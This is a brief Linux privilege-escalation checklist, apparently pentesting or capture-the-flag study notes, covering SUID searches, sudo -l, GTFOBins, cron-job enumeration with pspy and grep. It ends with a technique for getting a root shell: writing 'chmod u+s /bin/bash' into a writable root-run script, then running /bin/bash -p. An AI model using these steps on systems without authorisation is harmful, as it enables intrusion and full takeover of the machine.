Checklist (priv esc)

Note: Linux page has few notes if you missed it

  1. Check linux OS version

  2. Check kernel version (uname -a)

  3. Check sudo binary (find / -perm -4000 -ls >2/dev/null)

  4. sudo -l to check if any sudo bit is enabled for that user

    1. check : https://gtfobins.github.io/ for sudo binary exploits

  5. check cron jobs (/etc/cronjobs)

    1. well if you cant check root's cronjob directly ....... pspy might help

    2. run grep -nrw /dir/to/search/in -e "/path/of/script_or_file 2>/dev/null" to check if any file runs/uses the file.

Edit access on sudo script

echo 'chmod u+s /bin/bash' > /path/to/script/file.sh

#then type
/bin/bash -p #to get root shell

Last updated